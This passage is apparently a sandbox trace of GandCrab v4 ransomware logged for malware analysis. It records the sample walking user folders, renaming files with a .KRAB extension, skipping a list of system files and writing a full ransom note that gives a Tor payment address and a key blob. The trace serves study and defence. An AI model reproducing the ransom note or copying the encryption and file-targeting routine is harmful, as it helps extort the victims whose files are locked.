dwFreeType=0x8000) returned 1 [0057.338] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\") returned 49 [0057.338] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\*" [0057.338] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd4e0 [0057.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.338] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.338] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.338] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.338] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.338] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.338] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.338] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a08d2ca4dee3d.lock" [0057.338] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.339] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 77 [0057.339] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a08d2ca4dee3d.lock") returned 72 [0057.339] lstrlenW (lpString=".lock") returned 5 [0057.339] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.339] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.340] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.340] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.340] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.340] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.340] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.340] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\KRAB-DECRYPT.txt" [0057.340] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.340] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\KRAB-DECRYPT.txt.KRAB") returned 70 [0057.340] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\KRAB-DECRYPT.txt") returned 65 [0057.340] lstrlenW (lpString=".txt") returned 4 [0057.340] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.341] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.341] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.341] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\KRAB-DECRYPT.txt") returned 65 [0057.341] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\KRAB-DECRYPT.txt") returned 65 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.341] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.341] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.342] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.342] lstrcmpW (lpString1="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", lpString2=".") returned 1 [0057.342] lstrcmpW (lpString1="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", lpString2="..") returned 1 [0057.342] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\", lpString2="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}" [0057.342] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\" [0057.342] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.342] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.342] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.343] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\\\KRAB-DECRYPT.txt") returned 105 [0057.343] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\identities\\{ca8ca1bb-f2a6-4e9c-b7cc-fb56671763e8}\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0057.343] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.343] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.344] CloseHandle (hObject=0x3ac) returned 1 [0057.344] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.345] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.345] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x222)) [0057.345] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.345] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.345] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.345] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a08d2ca4dee3d.lock") returned 111 [0057.346] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\identities\\{ca8ca1bb-f2a6-4e9c-b7cc-fb56671763e8}\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0057.346] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.346] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.346] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\") returned 88 [0057.346] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\*" [0057.346] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd7a0 [0057.347] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.347] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.347] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.347] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.347] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.347] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.347] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.347] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a08d2ca4dee3d.lock" [0057.347] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.347] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 116 [0057.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a08d2ca4dee3d.lock") returned 111 [0057.347] lstrlenW (lpString=".lock") returned 5 [0057.347] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.347] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.347] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.348] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.348] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.348] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.348] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.348] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\KRAB-DECRYPT.txt" [0057.348] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.349] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\KRAB-DECRYPT.txt.KRAB") returned 109 [0057.349] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\KRAB-DECRYPT.txt") returned 104 [0057.349] lstrlenW (lpString=".txt") returned 4 [0057.349] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.350] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.350] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.350] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\KRAB-DECRYPT.txt") returned 104 [0057.350] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\KRAB-DECRYPT.txt") returned 104 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.350] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.350] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.350] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0057.350] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0057.351] CloseHandle (hObject=0x3ac) returned 1 [0057.351] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0057.351] FindClose (in: hFindFile=0xfbd4e0 | out: hFindFile=0xfbd4e0) returned 1 [0057.351] CloseHandle (hObject=0x43c) returned 1 [0057.351] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.351] lstrcmpW (lpString1="IDWv6mYH.mkv", lpString2=".") returned 1 [0057.351] lstrcmpW (lpString1="IDWv6mYH.mkv", lpString2="..") returned 1 [0057.351] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="IDWv6mYH.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\IDWv6mYH.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\IDWv6mYH.mkv" [0057.351] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.351] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\IDWv6mYH.mkv.KRAB") returned 55 [0057.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\IDWv6mYH.mkv") returned 50 [0057.352] lstrlenW (lpString=".mkv") returned 4 [0057.352] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.352] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".mkv ") returned 5 [0057.352] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\IDWv6mYH.mkv") returned 50 [0057.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\IDWv6mYH.mkv") returned 50 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="desktop.ini") returned 1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="autorun.inf") returned 1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="ntuser.dat") returned -1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="iconcache.db") returned 1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="bootsect.bak") returned 1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="boot.ini") returned 1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="ntuser.dat.log") returned -1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="thumbs.db") returned -1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="ntldr") returned -1 [0057.352] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="NTDETECT.COM") returned -1 [0057.353] lstrcmpiW (lpString1="IDWv6mYH.mkv", lpString2="Bootfont.bin") returned 1 [0057.353] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.353] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 